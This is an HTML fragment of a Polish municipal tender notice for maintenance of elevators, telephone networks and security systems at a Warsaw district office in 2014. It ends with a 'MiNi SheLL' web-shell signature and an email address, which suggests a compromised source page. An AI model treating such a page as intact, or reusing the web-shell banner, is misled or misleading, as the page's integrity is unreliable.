<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274a w szczególności wykonanie:
1)	jedenastu bieżących przeglądów konserwacyjnych  dwóch dźwigów osobowych nr rej. 312706037 i 312706079 oraz platformy pochyłej przyschodowej dla osób niepełnosprawnych typ VIMEC V64 nr rej. 3027000427, zainstalowanych w budynku Urzędu m.st. Warszawy Urzędu Dzielnicy Praga -  Południe przy ul. Grochowskiej 274 w Warszawie,
2)	jednego, głównego przeglądu konserwacyjnego dwóch dźwigów osobowych nr rej. 312706037 i 312706079 oraz platformy pochyłej przyschodowej dla osób niepełnosprawnych typ VIMEC V64 nr rej. 3027000427, zainstalowanych w budynku Urzędu m. st. Warszawy Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274 w Warszawie, zakończonego wykonaniem badań urządzeń o nr rej. 312706037 i 312706079 przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1)	konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga-Południe w okresie od dnia zawarcia umowy do 30.11.2014 r.
2)	usuwanie awarii central telefonicznych oraz sieci telefonicznej i logicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.33.41.00-6, 50.33.41.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe  a w szczególności wykonanie:
1)	czterech przeglądów konserwacyjnych systemów:
a.	sygnalizacji włamania i napadu,
b.	telewizji dozorowej,
c.	informacji o pożarze,
d.	kontroli dostępu, zainstalowanych w budynku Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274 w Warszawie,
2)	dwóch przeglądów konserwacyjnych systemów:
a.	oddymiania klatek schodowych,
b.	sterowania drzwiami ewakuacyjnymi,
c.	 informacji o zarządzeniu ewakuacji budynku,
d.	drzwi przeciwpożarowych zainstalowanych w budynku Urzędu Dzielnicy Praga Południe przy ul. Grochowskiej 274 w Warszawie,
3)   	czterech przeglądów konserwacyjnych systemów:
a.	sygnalizacji o włamaniu i pożarze,
b.	kontroli dostępu, zainstalowanych w lokalu Urzędu Dzielnicy Praga Południe przy ul. Podskarbińskiej w Warszawie,
       4)      dwóch przeglądów konserwacyjnych systemów:
a.	oddymiania klatek schodowych,
b.	wykrywania gazu (GAZEX),
c.	drzwi przeciwpożarowych, zainstalowanych w lokalu Urzędu Dzielnicy Praga - Południe przy ul. Podskarbińskiej 6 w Warszawie,
5)	jednej kalibracji dwóch sztuk detektorów gazu  zainstalowanych w piwnicy lokalu Urzędu Dzielnicy Praga - Południe przy ul. Podskarbińskiej 6 w Warszawie,
6)	jednego czyszczenia komór czujek optycznych zlokalizowanych w systemach wymienionych w pkt. 1: lit. a i c, pkt 2 lit. a i b, pkt 3 lit.a oraz pkt 4 lit. a, oraz sprawdzenia poprawności ich działania poprzez kontrolne zadymienie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com